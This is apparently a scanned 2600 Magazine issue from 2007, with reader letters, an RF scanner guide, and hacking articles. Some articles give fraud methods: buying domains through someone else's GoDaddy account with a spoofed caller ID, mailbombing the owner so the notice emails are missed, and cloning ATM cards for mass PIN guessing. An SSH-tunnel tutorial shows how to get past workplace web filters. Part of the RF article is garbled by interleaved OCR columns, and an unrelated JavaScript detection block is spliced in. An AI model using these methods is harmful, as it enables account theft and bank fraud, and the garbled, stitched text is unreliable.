"I just posted a bulletin about hackers hiding in our pictures. I followed the directions in the bulletin and found one picture that I had to delete. Here's the deal: Hackers are getting into our picture galleries and posting inappropriate pics behind our original pics. To find out if this happened to you, follow these steps:
Go to Edit profile. On the right hand side near the top, you have the option to view profile, etc. Click "Safe Edit Mode." Then click Images. If you see your caption, but a different picture, that pic needs to be deleted. To delete it, go to your home page. Click add/edit photos. Then delete the picture with the caption that had the wrong pic. When you're in add/delete pics, the pic you uploaded will show. It still needs to get deleted. The hacker has their pic hiding behind your original picture. Tricky lil people, eh!?
If only these people could use their smarts for good!! This world would be a happier place.
You should probably change your password after you delete the pics, just to be on the safe side."
Okay, I have seen this mentality for quite some time now having been into computer security for a while... the way that the "hacker" has become something of the ghost of a monster, lurking in the "back alleys" of the Internet, waiting to take your soul to Internet hell. It is regrettable that the media portrays this image and that all of us have just bought it without question, even when some of these same people that buy the image of the evil hacker pose as the open-minded and "watchers of the watchers," so to speak.
The name of the hacker has been bastardized from so many angles, yet the original intention of "hacking" was to improve security by exploring vulnerabilities and informing those in charge of our security about these vulnerabilities. Granted, any knowledge can be taken for ill purposes but that doesn't mean that we should abandon exploration for the sake of some strange "safety."
Perhaps these bulletins could just as easily have replaced the word "hacker" with "vandal" or "thief" and the message would contextually remain the same. But I suppose that by now the meaning of the word has been changed by our media (that incidentally will vilify anything with a marginal voice to obtain ratings, equaling ad dollars). First it was "witches," then "Turks" or "Jews," after that "communists" and "gays," and now "hackers" and "terrorists."
Maybe you could read up for the hour that it would take you to understand the most simple of security concepts that you could use to help protect yourself, instead of living in fear of some intangible threat that almost always is some young teenage kid who simply wants to have a little fun and cause some mischief. Kids have been doing that ever since humans have lived in a society.
Rev. Troy (SubGenius)
More so than an actual person engaging in mischief is the mere specter of someone engaging in behavior that our shrill-voiced minders convince us is cause for panic. In other words, we literally obsess over scenarios that aren't playing out but which one day in a worst-case scenario might.
It doesn't matter what story the media is reporting. If it has anything to do with computers, phones, credit cards, or technology in any sense, hackers will be the ones seen as the threat. Never mind that a bank has taken your private information and passed it around to all sorts of other entities without your permission. Never mind that they do this to millions of people every day. And never mind that they don't even bother to secure this information properly and always wind up losing it or putting it in places where it becomes accessible to the entire world. All of that is irrelevant compared to the possibility that "hackers" will find this information and use it to make your life miserable. Hackers become the threat and the real guilty parties get to walk away and do the same things over and over. Most people understand this absurdity. It's our job to see that the media gets it too. Whenever such a story gets reported, those spreading it around need to hear from us letting them know in no uncertain terms that hackers are not the problem and, in many cases, they are the solution. Don't give in to their sloppy journalism by conceding their misuse of the word and renaming yourself as something else. That doesn't solve anything and eventually they'll just misuse any other words we come up with as well. It's a frustrating battle to be sure, but it's most certainly not a lost cause.
Incidentally we don't believe the word "terrorist" has ever meant something non-evil, unlike all your other examples. That word, however, is being used far too commonly to describe things that barely would have attracted any attention in the past and which continue to cause no harm today.
The Format
Dear 2600:
Regarding the latest format, here are some reasons why I don't like it:
1) Paper smells bad. When I've opened previous issues, there has been a noticeable absence in the aroma department. The current issue (23:4) smells like an old Xerox machine.
2) The paper has a bad gritty feeling, kind of like when you make your own toothpaste and forget to mash up the calcium pills enough. There's a sandy residue that just doesn't feel right.
3) I personally feel that the fold-n-staple binding is better than the glued binding. The staples will hold that sucker together for a long long time. In the glued version, the pages will fall out when I photocopy some of the better illustrations/hacks/how-to's into my personal collection of DIY articles. Also, some of the lettering is close to the spine and can be annoying to read.
If you went to this format due to costs, then I would definitely read it this way over not reading anything at all. However, if this was just an experiment, I'd like to put in my vote for "no" if there are actually votes being tallied.
But, most of all, thanks for always trying to be fresh and innovative.
Brian Heagney
This is the first we're hearing that we had a non-offensive aroma. Knowing this now we will figure out how to get it back. We'll also find out if there are any differences in the actual paper used. As for the binding, we've heard pros and cons on the new style. We do know it won't fall apart and that this style is used by many publications. This is something we don't have a choice in as it's the only kind of binding our new printer does.
Dear 2600:
Did you try a new way of printing the magazine with the Winter issue? Because I liked it a lot better when you just stapled the pages of the magazine together. It was a lot easier to get the magazine to lay flat while you were reading it, which is something that is very important if you read while you're eating. Now, you have to practically tear the pages out if you want them to lay flat. If anything, the inside page margins need to be extended about half an inch, because with the magazine bound like this, you can hardly read the text on the inside edge of the pages. But I would say just go back to stapling the pages, it worked a lot better.
Jef
We're aware of the problem with the margins and we apologize for any hardship that may have caused. As you can see, we've made them a bit wider for this issue. This is part of the growing pains involved when trying something new. There were others...
Dear 2600:
I read in "Transition" that a new company is printing the magazines and I noticed that immediately because the binding had changed. But, whatever ink they are using is making its way to my fingers more than staying on the magazine front/back cover. It is leaving my fingerprints for anyone to admire on whatever I touch. I liked reading your magazine without having to feel like I had been processed at the police station when I'm done reading it. Could you talk to the printer about this? Are there other printers to consider?
Inked Fingers
Dear 2600:
Just wanted to call your attention to the black ink used on the cover of the Winter 2006-2007 edition of 2600. The ink rubs off!
I got my subscription in the mail, opened it, and accidentally left it on the counter after my lunch break. My flatmate came by and thumbed through it before I got back to it. By then there were black fingerprints on a few pages. (At first I thought it was a clever printing trick and then I thought it was sloppy work at the printer. But no, soon I noticed my hands were turning dark and the back cover had some places where the black ink was rubbed away (did they print it with dry erase ink?!).
I went by and warned my local small newsstand (Newsland) to put them in plastic baggies (when they get their shipment if it has the same ink problem) on the shelf to keep people from messing up the covers (making them unsellable). I'm sure someone will see the baggies and think they are trying to restrict readers (like how they bag porn).
Adric
Let's just call that our special "fingerprint issue"
and not speak of it again.
Dear 2600:
I love this zine and all that comes with it. I remember the first time I just happened onto your pages in a bookstore. I have been engrossed ever since. Thanks for the insight, the commentary, and all that you and the writers do.
I remember when Playboy lost their staple binder. They too have been unstoppable ever since!
IroeB
Well then we're certainly heading down an interesting road.
Dear 2600:
I like the new binding your magazine has now. I have a suggestion though. It would be nice to have the volume and issue number on the spine. A clever message or quote on the spine would be a nice touch also.
Jason
We'll consider our options now that we've finally
grown a spine after 20 years.
Dear 2600:
Please provide an index in the back of the magazine, or at the end of each article, of all URL's which appear in the articles. Sometimes I read about a URL and then I can't find which article it was in. You could even have the authors do the work for you as part of the submission guidelines, i.e., attach the list at the bottom of every article.
Just looking for a way to explore more of this great world you're creating. This would help make it easier.
Ian
This is a good idea, one which a number of our writers already engage in. We'll encourage the rest to follow suit.
Sales
Dear 2600:
Opening the Winter 2006-2007 issue and reading the "Transition" editorial, I started thinking of ways to help out. Obviously I try and do my part by subscribing, but that just makes me one of (hopefully) many thousands. So, let's multiply the efforts of those thousands....
I have noticed a "Display Until" date on many magazines on newsstands and in bookstores. I assume this is the date that the unsold copies are destroyed. Does 2600 specify a certain date to keep unsold copies on the shelves until? If so, I suggest 2600 share that date with your readers, and we all can make a concerted effort to visit any newsstand selling 2600 on or just before that date. At that point, we should purchase as many of the remaining copies as we have the means to and distribute them to interested parties. They could be given out to friends, family, coworkers. Bring a stack to the local meeting and give them out to anyone who hasn't been able to get their copy, or any interested passersby who wonder what we are about. If we can clear out every unsold copy before the distributor/retailer can destroy them and charge 2600, then we will be both saving 2600 money and "spreading the word" to many more individuals.
If this date is set by the retailer rather than 2600, we all need to survey our local booksellers and newsstands and share this data with each other so we know when to make our purchases. Obviously we don't want to make it more difficult to locate a copy locally - only snatch up the spare copies just before destruction.
You say you exist to serve us, your readers. For that I thank you. Please let us know what we can do to help you accomplish this.
saiboogu
That's an incredibly generous idea on so many levels. Thanks for suggesting it. As for on sale dates, as of this issue we have finally attained a consistent schedule which should be easy to remember. Each new issue will be on sale on the "2600 Friday" (first Friday of the month) following a season change. So anytime it's the first Friday of a new season, you should be able to find the new issue at newsstands. In other words, this issue will be on sale on Friday, April 6 since that's the first Friday of the month following the start of spring (and we assume the previous issue will be taken off the shelves at around this time). The next issues will be on sale on July 6, October ., etc. We intend to do whatever it takes to keep to this schedule.
Dear 2600:
First of all, great magazine and keep up the good work. I buy your magazine at my local Barnes & Noble here in Orland Park, Illinois. I was skimming through the Winter 2006-2007 issue while waiting in line to purchase and saw a back cover photo related to Barnes & Noble and decided to show the cashier. He said they have to enter a price manually for each and every magazine. Makes sense. I have also noticed this in the past, since magazines can change prices regularly (including this one which went up this issue) unlike books which have the same price and don't go up each year or so.
CPeanutG
The UPC (bar code) has the price imbedded in it. Note that when our price changed, so did our code. So something isn't quite right with that explanation. In the case of Barnes & Noble - as it's been explained to us - if the magazine isn't scanned (or if the entire UPC isn't entered manually) the sale isn't credited to us. And we wind up paying a big percentage for any "missing" magazines. So if you ever get a receipt that doesn't display our name on it from the UPC database, we'd really like to know about it since that probably means (with this bookstore chain at least) that we're not getting credited.
Dear 2600:
I just thought I would tell you guys when I bought my latest mag at my local Barnes & Noble the clerk there, who is also an avid reader, pointed out to me that that photo of the register is not a "glitch" because all magazines have to be manually entered. They scan the mag but enter the price. He said it was like this nationwide, according to the manager.
TwitcH
This also makes little sense to us since the price should be included in the UPC at least in the States. But at least there's an indication that a sale of the magazine is being logged.
Dear 2600:
As a man in my 60s I may be an exception to the norm. I didn't know how much 2600 cost before and I do not know what it costs now. When I see a new issue on the newsstand I buy it. The only way I would care about the price would be for it to get so high as to call itself to my attention. But for now the content is worth whatever you are charging. Hope you can hang on.
Johnson Hayes
We intend to and thanks for the support.
Dear 2600:
When you were embroiled in the DeCSS lawsuit I thought that a good way to help you was to become a (vocal) lifetime subscriber. I now realize that I may be contributing to your economic woes at this point. So, is there any way I can contribute to your magazine (renew my lifetime subscription, if you will)?
Alfredo Octavio
Thanks for your concern but a lifetime subscription is just that: good for your (or our) entire lifetime. It's theoretically possible that if you died and then were brought back to life that you would then have to get a second subscription but you would likely also have to change your name and address since our computer would assume that you were still living your first life. You could lie to us and just say you're somebody you're not and we would never know. Or you could also make a lot of enemies by subscribing unwilling people to our magazine for their entire lifetime. Whatever you do, don't feel guilty. Our lifetime subscribers have been quite essential for our existence and we're glad you're a part of our family.
Dear 2600:
I just received 23:4 today. I was surprised when you wrote two whole pages explaining why you had to increase the price. I think your magazine is still worth more than you charge. The information that is presented in the magazine is a true inspiration because it reminds me why consumerism and commercialism bite. The sharing of information is beautiful, and so often we get fed rubbish by greedy corporations that try to Fox their way into our minds.
So thank you so much for your magazine and you should never have to apologize to your readers for a modest price increase over the years. I can't think of any other magazine that charges what you do and can bring the same level of content. Wait until my son can start reading! You'll have another reader then.
DigiCOl
We want to thank you and the many others who have written with words of support. We've been through some difficult times and we've faced a lot of challenges but it's the spirit of our readers that always comes through and makes it all worthwhile.
Dear 2600:
What cost increase? I didn't even notice. If I compare the cost to learning/information ratio I am still getting more than my money's worth. I don't get through all of one issue before I buy the next. Your booklet and PC Answers out of England are the best buys on the market.
In reading your comments about why your prices go up, I want to let you know what happened to me on my last purchase.
First, the books were on a flat bottom shelf under tilted shelves. They are harder to see. If I were not specifically looking for it I would miss it.
Second, at checkout, your book was the only one of three that had to be manually entered. No waving the magic wand. Are they paying you? I don't know.
I do wonder how the new binding will hold up with me folding it all the way back for easier reading.
Keep up the good work.
Prof. Morris Sparks
Dear 2600:
I've seen the issue of shrink mentioned in two issues of 2600 if I remember correctly. While reading "Transition" I realized that almost every time I've purchased a 2600, including the latest issue, the cashier cannot get the bar code to scan and punches in the price manually. So far I've purchased a total of around eight to ten issues from Barnes & Noble, Borders, and Wegman's. I have my latest receipt which contains the following for my purchase:
Periodical
7 2 5 2 7 4 0 3 I 5 0 6 6 4 IR 6 . 2 5
This was from a Borders store. I'm not sure if that identifies it as a 2600 or not. If you think you guys are getting shafted on this one, I could send you the receipt. I don't know if any of this helps, but I figured it couldn't hurt to send a heads up.
F
In this case it appears the cashier punched in the UPC manually as those numbers match the ones which can be found on our Winter 2006-2007 issue. But we have to wonder if there is some sort of a fail-safe method to prevent the wrong numbers from being entered or, worse, no numbers at all. Our bar code is up to the industry standard and should work everywhere.
by Tom from New England (aka Mr. Icom)
Having been an RF hacker for a couple decades, I'm glad to see an increase in interest among technological enthusiasts in the wonders that exploring the radio spectrum has to offer. Things have changed quite a bit since 1987 when I wrote my first article for 2600. What a long, strange trip it's been.
One of the staples of the monitoring enthusiast was Radio Shack's Police Call frequency directory. No matter where you lived in the USA, you could walk into the McDonald's of electronics stores and have all the public safety records of your locale and a bunch of useful reference material at your fingertips. Later issues included a CD containing the whole country's public safety license data, selected businesses, and all the other extras that ensured Tandy Corp. received at least some of your hard-earned cash once a year. The most useful part of Police Call was something they called the Consolidated Frequency List. It told you what service was allocated to a particular frequency. With it, you could look up a frequency like 45.88 MHz and quickly find out it was allocated to the Fire Service for "intersystem" communications (that frequency by the way, happens to be the inter-county channel for New York State fire departments). Unfortunately Police Call's last edition was published in 2005. You still might be able to find a copy of the last edition at a local Radio Shack and it would be a worthwhile reference just for the Consolidated Frequency List.
The Internet has a number of sources for frequency data. The most popular site is Radio Reference at http://www.radioreference.com/. Originally a site for information about trunked radio systems, it's probably the biggest site of user-contributed frequency and radio system data on the Net. The second site is run by the FCC, and is commonly known by the nickname "Gullfoss." It is the FCC General Menu Reports page, which is the whole FCC license database. Its URL is http://gullfoss2.fcc.gov/reports/index.cfm. What I like to do is take the latitude/longitude coordinates of the location I'm staying at and do a "Location/Frequency (Range)" search off Gullfoss for a 5 to 15 mile radius from said location, depending on how populated it is. If you're in a place such as New York City, even doing a one-mile radius search will provide you with more frequency data than you'll initially know what to do with.
The problem with raw license/frequency data is that you could get a dozen frequencies for a specific agency or business and still have no idea what specific use the frequency has. The Radio Reference site can sometimes help with this, depending on how many active contributing scannists are in the area of interest. Despite the demise of Police Call, there are still numerous "local" frequency directories that may be available at your nearby radio shop. Those of you in the Northeast who want a nice complete printed directory to hold in your hands are blessed by the presence of Scanner Master in Massachusetts. Their web site is http://www.scannermaster.com/ and they sell some rather excellent detailed guides for the Northeast. Their Southern New England Pocket Guide is a constant monitoring companion of mine along with a well-used Moleskine pocket journal.
Readers of 2600 should be familiar with the Signal Stalker police scanners, since there have been a couple of articles published in previous issues. Many people have an interest in hearing signals in their immediate vicinity. Upon seeing someone nearby with a handheld radio, they wonder what the frequency is and what's being talked about. Back in the old days, we used handheld frequency counters like the $99 Radio Shack special, or a much more expensive Optoelectronics Scout. There were also "nearfield receivers" like the Optoelectronics R-10 Interceptor and Xplorer, but they too were beyond the financial reach of many hobbyists. The frequency counters worked OK, but you generally had to get within a hundred feet or so of the transmitter. You also had to contend with continuously transmitting high-power annoyances
such as broadcasters and pagers.
The Signal Stalker changed all that. Instead of carrying around both a frequency counter and a scanner, your scanner serves double duty. Annoying signals can be ignored, and you can immediately hear the signal upon detection. You can scan your usual frequencies and set it to alert you when something nearby keys up. You no longer have to get as close to a transmitter, as it can detect signals from 1000 feet away. And you could own a Signal Stalker for under $100. The ubiquitous model was the Radio Shack PRO-83 handheld. Now discontinued, it retailed for $120 but was often on sale for under $100. You still might find one at the clearance price of $70. Its lesser-known twin is the Uniden BC-92XLT. Uniden refers to the near-field reception feature as Close Call, but it works the same way as Radio Shack. Other than some minor firmware differences, they are the same unit. A certain infamous retail store chain from Arkansas has it in the mobile electronics department for only $99.99. There are also higher-end Signal Stalker/Close Call scanners available that have extra features such as trunk tracking, P25 reception, and continuous 25-1300 MHz (minus cellular) frequency coverage.
One of the main complaints I hear about the Signal Stalkers is the lack of capability to lock out annoying frequencies while in Signal Stalker mode. For starters, if you have a Uniden BC-92XLT, enable the Close Call "pager skip" function. This will eliminate the vast majority of annoying signals. On both units, when you find an annoying signal in SS/CC mode simply hit "FUNC" twice and then "L/O". This will lock out the frequency. The user manual is a little vague on that.
Unlike frequency counters, the signal acquisition time on Signal Stalkers is a little longer. To shorten this time, deselect bands you're not at the moment interested in hearing activity on. For example, if you're in
necessarily better because of the frequency counter's lack of selectivity. A high-gain antenna attached to a frequency counter usually resulted in the counter displaying the frequency of a local pager or broadcast transmitter. This is not the case with a Signal Stalker. A high gain antenna combined with the Signal Stalker's ability to lock out annoying signals and select individual frequency bands will result in an increase in near-field reception range. Using a magnet-mount scanner antenna on the car, I've "detected" my county's fire dispatch frequency from ten miles away, and a five watt VHF-low band R/C link from about 2000 feet.
One thing I noticed about the PRO-83 is that the supplied short antenna is barely adequate. The BC-92XLT has a slightly better stock antenna, but as a general rule all stock rubber duck antennas that come with scanners are designed for uniformly average to mediocre performance across a wide frequency range. I suggest upgrading with a better aftermarket antenna. You can get a Radio Shack #320-034 Deluxe Rubber Duck Antenna for general purpose monitoring, or their #20-006 telescoping whip for when you're in a fixed location and want optimum reception. In a similar vein, when driving in a vehicle having the scanner with a rubber duck antenna sitting on the seat next to you won't cut it. Get an external antenna for your vehicle. While on the subject of antennas, you might be able to scrounge something up depending on what bands you are interested in. CB antennas work very well on the VHF Low band (30-50 MHz). Dual-band (two meter and 70 cm) ham antennas will work for the VHF high and UHF bands (138-144 and 440-512 MHz). Old AMPS cellular antennas are perfect for the 800 and 900 MHz bands, but you will need a TNC-to-BNC antenna adapter to use them.
I've received a fair number of emails from people asking what scanner they should buy.
t he mi ddl e of some rural farml and and t here For a bas i c non-tr unk-tracki ng, non- P2 5 uni t
i s no UHF or 800 MHz act i vi ty, then desel ect the PRO-83 or BC-92XLT i s an excel l ent
those bands. Si nce you wi l l probabl y ( note val ue for the money j ust to have near-fi el d
I sai d probabl y) not hear anythi ng on t he recepti on capabi l i ty. When i t comes to t runk
ai rcraft band u n l ess you l i ve next to an ai rport, tracki ng scanners however I woul d avoi d
you mi ght want to desel ect the ai rcraft band buyi ng one at the moment. Why? The reason
as wel l . You never know what you mi ght be i s somethi ng cal l ed " rebandi ng" . At present
mi ssi ng however. I don ' t l i ve near an a i rport, the 800 MHz l and mobi l e band i s a host to
but I ' ve gotten Si gnal Stal ker h i ts from pl anes both publ i c safety communi cati ons and the
fl yi ng overhead at l ow al ti tude. Nextel servi ce. Thi s has resul ted i n i nterfer-
Many of you who have pl ayed wi th ence i ssues over the years. To el i mi nate the
frequency counters were aware of the fact probl em, the FCC i s doi ng the fol l owi ng:
that a " bi gger" ( hi gh gai n) antenna was n' t 1 . Movi ng Nextel to the top of the 800
Spring 2007Page 49
MHz band and publ i c safety to t he bottom.
At present, publ i c safety communi cati ons are
most l y on the edges of the band, wi th Nextel
i n the mi ddl e.
2. Changing the channel/frequency spacing from 12.5 kHz to 6.25 kHz. This will double the amount of channels available. Consequently, radio users will have to convert to narrowband modulation.
3. Eventually moving Nextel off the 800 MHz band and up to the 1.9 GHz PCS band.
This is troublesome for trunk-tracking scanners because of Number 2 above. Each 12.5 kHz frequency is assigned a channel number. The channel number/frequency assignments will change when the band goes to the narrower spacing. Trunk-trackers use those channel numbers to determine what frequency to tune in order to follow a talk group on the system. After a system has been rebanded, the current crop of trunk-tracking scanners will not follow the system as the channel number/frequency assignments will be all wrong.
New England was supposed to be the first to go through rebanding, and the process has yet to occur as of the time of this writing. I'd expect other parts of the country to go through similar delays. As far as scanner manufacturers are concerned, Radio Shack initially said the firmware of their trunk-tracking scanners would be upgradable but then changed their mind. If you have a current model Radio Shack trunk-tracker scanner, you will be out of luck once rebanding occurs to the systems you monitor. Uniden (Bearcat) has said that their current models will be firmware upgradable and some upgrades have already been made available to correct a few bugs found in early versions of the firmware. However I suspect that unless the rebanding progresses quicker, once the "current" models become discontinued, product support (including firmware upgrades) for them will cease to exist as is usually the case with "obsolete" equipment.
Once the FCC, land mobile radio industry, and Nextel get their collective act together and figure out once and for all the final fate of the 800 MHz band, then things will be all fine and dandy. Until then, if you simply have to buy a trunk-tracker spend as little as possible for a used one at a hamfest. This way you won't feel so bad when it simply becomes a conventional scanner after rebanding. If you have a large sum of money burning a hole in your pocket, and you simply have to buy something new, get one of those computer controlled, DC-to-Daylight communications receivers made by Icom or AOR. They actually will never become obsolete. With the computer interface, they can be used with the Trunker software to follow trunked radio systems, even post-rebanding. They are readily modified to provide a 10.7 MHz IF output in order to use an AOR ARD25 P25 decoder box for demodulating P-25 audio. They also feature full frequency coverage from 100 kHz to 2+ GHz (minus cellular in the United States). No matter what frequency gets reallocated to what, you'll be able to tune it. As a new RF hobbyist, a communications receiver is more versatile than a police scanner. You can listen to local VHF/UHF public safety communications one week, tune down the spectrum a little bit for shortwave broadcasters and ham radio operators (3880-3885 kHz - AM mode) the next week, do a little experimentation with computerized monitoring the next, and finish the month out playing with monitoring the various digital modes you encounter on the air.
by SlEZ
Have you ever looked into how insecure godaddy.com really is? Before I go into detail let's first make something clear. To do this you must have access to someone's GoDaddy account. You cannot say that it is totally impossible for a GoDaddy account to be broken into. Email spam plus careless people are proof of this.
Let's say you somehow got access to a GoDaddy account that you are not the owner of. All you would have to do is click on My Account and any type of information you would need about the person is right in front of you. In there you will see My Customer # which could come in handy. Then by going into Account Settings the person's full name, address, city, state, zip code, country, and phone number are displayed. Now in Account Security Information, which is under Account Settings, the email address used under the account is displayed. Also in Account Security Information they were nice enough to display the Call-in Pin which is a four digit number that you supply to the Customer Service or Technical Support representative when you call GoDaddy in order to verify your identity and customer account. The final piece of information you will need in Account Settings is Payment Information which displays the type of credit card used, the last four digits of the credit card, expiration date, and when the credit card was last used. What I do not understand is why all this information is being displayed and only protected by one single password.
Someone can simply call up GoDaddy and buy a domain name under someone else's account. You can even spoof the number you're calling from to the one under the account. Go Daddy will ask you for the information that I have listed above and before adding the domain to your account the sales rep will ask you for the last four digits of the credit card. Now say someone does this. They can easily make another GoDaddy account and transfer over the domain and if the owner logs into their account there will be no trace of the newly purchased domain name.
Any actions made under the account will notify the account owner via email. Simply mailbombing the account owner's email with the email addresses sales@godaddy.com and support@godaddy.com about 500 to 999 times will increase the chance that the person will delete all those emails along with the ones really sent from godaddy.com. Also keep in mind many people use the same password for all their accounts and the same email address for all their business. Even if the person has a different password for their email, with the information displayed in their GoDaddy account you might be able to reset the password. That email address could be connected to an online banking account or even PayPal.
There is no need for this information to be displayed for any reason. Nothing can be 100 percent hacker-proof but having sensitive information out like that isn't a smart move by GoDaddy. To fix this problem all they would have to do is have a security question prompt. If answered correctly, access would be granted to Account Settings. This might not solve the problem fully but it would make it harder for people to obtain personal information about the owner.
Another security flaw in Account Security Information is the Enable Card on File option. All you need to do is check the option, confirm the password, and then you can purchase items on godaddy.com without a credit card and without calling up to social engineer the sales reps.
by S. Pidgorny
Distributed denial of service attacks are a sad reality of today. Coordinated botnets are using their numbers to overwhelm their target, consuming either all processing resources or all bandwidth. The attacks are incredibly hard to counter, as often there's no detectable difference between the bots and legitimate users. Even if there is, the intrusion prevention systems should have enough capacity to process large numbers of requests, making them targets of the attack themselves.
But what if the participants of distributed attacks were not bots but real people? That opens new opportunities for attacks against well known targets. A good example would be PIN brute forcing in an automatic teller machine (ATM).
ATM cards generally use a magnetic strip and require a PIN to get the account balance or withdraw cash. You have three tries to get the PIN right. After the first or second time you can cancel and get the card back. PINs are generally four digit decimal numbers (0000 to 9999). So one gets two shots at guessing the PIN (ATM swallows the card after the third wrong PIN attempt), and the probability of a successful guess is therefore 0.02. It will take days of full time PIN guessing for somebody to get access to the money if they have a card but don't know the PIN.
Unless PIN brute forcing is distributed. Copying an ATM card is a trivial task. Equipment for it is cheap and widely available. Picture a group of 5000 people doing PIN guessing at the same time. The coordinator distributes magnetic strip information, the force (do we call them hubots?) writes strips on white plastic and uses 5000 ATMs at the same time with preassigned PINs, just two for each hubot. Success is certain, the attack takes just minutes, and is as hard to counter as any other distributed attack.
A few factors still offset the risk: forming the army of hubots, which is very geographically distributed (thousands of ATMs are needed), extraordinary organizational skill is needed, the magnetic strip information needs to be obtained somehow, and monitoring systems could flag the use pattern and prevent the card from being used until the owner contacts the bank. But the required resources can already be in place, as the criminal economy has significant scale and workforce. Only completely switching from easily clonable cards to cryptographic chip cards will fully mitigate the risk of such distributed attacks against bank cards.
Shouts to the P&A squad, J.K., Cookie, and Nicky. We shall outsmart.
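The article says monitoring systems "could flag the use pattern". The following is an added example (not part of the article, and not any bank's code) of what such a check looks like from the issuer's side: a sliding-window velocity rule over authorization events. The event records, the window length and the thresholds are constructed/assumed values for illustration; a single legitimate cardholder who mistypes once at one machine passes, while one card number producing wrong-PIN results at several machines within minutes is flagged and can be blocked until the owner calls in.

```javascript
// Constructed sample authorization events: one card number hit from several
// ATMs with two guesses each (the "hubot" pattern), plus two ordinary customers.
const SAMPLE_EVENTS = [
  { card: '4000111122223333', atm: 'ATM-0001', ts: 0,      result: 'WRONG_PIN' },
  { card: '4000111122223333', atm: 'ATM-0001', ts: 10000,  result: 'WRONG_PIN' },
  { card: '4000111122223333', atm: 'ATM-0002', ts: 20000,  result: 'WRONG_PIN' },
  { card: '4000111122223333', atm: 'ATM-0002', ts: 30000,  result: 'WRONG_PIN' },
  { card: '4000111122223333', atm: 'ATM-0003', ts: 40000,  result: 'WRONG_PIN' },
  { card: '4000111122223333', atm: 'ATM-0003', ts: 50000,  result: 'WRONG_PIN' },
  { card: '4000111122223333', atm: 'ATM-0004', ts: 60000,  result: 'OK' },
  // ordinary customer: one mistyped PIN at a single machine, then success
  { card: '4000999988887777', atm: 'ATM-0042', ts: 0,      result: 'WRONG_PIN' },
  { card: '4000999988887777', atm: 'ATM-0042', ts: 20000,  result: 'OK' },
  // ordinary customer: two withdrawals hours apart at different machines
  { card: '4000555566667777', atm: 'ATM-0007', ts: 0,                result: 'OK' },
  { card: '4000555566667777', atm: 'ATM-0009', ts: 3 * 3600 * 1000,  result: 'OK' },
];

// Assumed policy values: a 10-minute window; more than MAX_WRONG_PINS wrong
// PINs or more than MAX_DISTINCT_ATMS machines inside the window is abnormal,
// because a single ATM would have swallowed the card after the third miss.
const WINDOW_MS = 10 * 60 * 1000;
const MAX_DISTINCT_ATMS = 3;
const MAX_WRONG_PINS = 2;

// Returns one alert per card whose events violate the policy inside any window.
function flagDistributedPinGuessing(events, windowMs = WINDOW_MS,
                                    maxAtms = MAX_DISTINCT_ATMS,
                                    maxWrong = MAX_WRONG_PINS) {
  // group by card number
  const byCard = new Map();
  for (const e of events) {
    if (!byCard.has(e.card)) byCard.set(e.card, []);
    byCard.get(e.card).push(e);
  }
  const flagged = [];
  for (const [card, list] of byCard) {
    list.sort((a, b) => a.ts - b.ts);
    let start = 0;
    for (let end = 0; end < list.length; end++) {
      // slide the window start forward until it spans at most windowMs
      while (list[end].ts - list[start].ts > windowMs) start++;
      const slice = list.slice(start, end + 1);
      const atms = new Set(slice.map(x => x.atm));
      const wrong = slice.filter(x => x.result === 'WRONG_PIN').length;
      if (atms.size > maxAtms || wrong > maxWrong) {
        flagged.push({ card, distinctAtms: atms.size, wrongPins: wrong,
                       windowStart: list[start].ts, windowEnd: list[end].ts });
        break; // one alert per card is enough; the card gets held
      }
    }
  }
  return flagged;
}

// Stand-alone run
for (const alert of flagDistributedPinGuessing(SAMPLE_EVENTS)) {
  console.log('hold card', alert.card, 'wrong PINs', alert.wrongPins,
              'ATMs', alert.distinctAtms);
}
```

The window-based count is the key: the attack in the article works precisely because no single ATM ever sees a third wrong PIN, so the counter has to live with the card number at the issuer, not in the machine.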
jamespenguin@gmail.com
Picture yourself in the following situation. You're at school/work minding your own business simply perusing the Internet and all it has to offer. However when you try to visit your ninja clan's website, you are instead presented with a web page stating that this particular website is blocked. Naturally you are shocked and offended by such an action. So do something about it; sneak through like a ninja with an SSH tunnel.
A Brief Explanation
For those who have no idea what an SSH tunnel is, imagine that whenever you establish a connection to an SSH server that you are digging an underground tunnel from your location at Point A to the server's location at Point B in which a messenger carries messages back and forth between you and the server. The reason that the tunnel is underground is because your connection is encrypted. Because of this people cannot see what is being sent back and forth through your connection (underground tunnel). Now once you have established a connection, you have an entire tunnel to send data back and forth through.
Now the great thing about this underground tunnel is that it is big enough so that it can fit more than one messenger. As a result it is possible to send messengers with messages for a server at Point C through the underground tunnel, have them relayed from Point B to Point C, from Point C back to Point B, and then through the underground tunnel back to you at Point A.
For a more detailed explanation see the Wikipedia page about Tunneling Protocols: http://en.wikipedia.org/wiki/Tunneling_protocol
The Guards
Let's assume that the network that you are currently on has a server that filters web traffic, is guarded by a firewall that does not allow inbound connections, and only allows outbound connections on ports 21 (ftp), 80 (http), and 443 (https). How is this information useful, you ask? Well, we know that we can get traffic out of three different ports which means that you have three openings from which you can dig a tunnel.
Preparation
In order to successfully sneak through the firewall/web filter you will need two things:
- An SSH server listening on one of the ports that you are allowed outbound access on. For help setting up an SSH server see: http://lifehacker.com/software/home-server/geek-to-live--set-up-a-personal-home-ssh-server-205090.php
- An SSH client, either PuTTY (GUI) or Plink (Command Line). This article covers the use of Plink. You can download both PuTTY and Plink from: http://www.chiark.greenend.org.uk/~sgtatham/putty/
A Simple Tunnel
The command for creating a tunnel with plink is plink -N -P PortNumber -L SourcePort:RemoteServer:ServicePort -l UserName SSHServerAddress. For PortNumber use a port that you have outbound access on. For SourcePort use any number between 1 and 65535. For RemoteServer use the IP address of a remote server you would like to access. For ServicePort use the port of the service you'd like to access on the remote server.
For example, to tunnel an http connection to a remote server at 72.14.207.99 through an SSH server listening on port 21 and with the address 123.123.123.123, the command would look like plink -N -P 21 -L 1337:72.14.207.99:80 -l YourUsername 123.123.123.123. Once you have entered your password, open up a web browser and enter http://127.0.0.1:1337 into the address bar and you will be looking at the Google home page.
Note 1: When using the above command syntax, after you have provided your correct password, the blinking cursor will drop a line. This means that your login was successful.
Note 2: Tunnels can be used to proxy a connection to any address on any port, however this article will focus on tunneling web pages.
Dynamic SOCKS-based Jutsu!
While a simple tunnel may be all right for connecting to one specific server, a ninja such as yourself has many different servers to browse and it is impractical to create a tunnel for each different server that you may want to connect to. This is where dynamic SOCKS-based port forwarding comes into play. In n0n-1337-ninj4 terms this is an SSH tunnel similar to the one created in the section above, but its RemoteServer and ServicePort are dynamic. However its SourcePort remains the same.
The command for creating a dynamic tunnel is plink -N -P PortNumber -D SourcePort -l UserName SSHServerAddress. Creating a dynamic tunnel is a little less confusing (syntax wise) than a simple tunnel, however using it is slightly more complex.
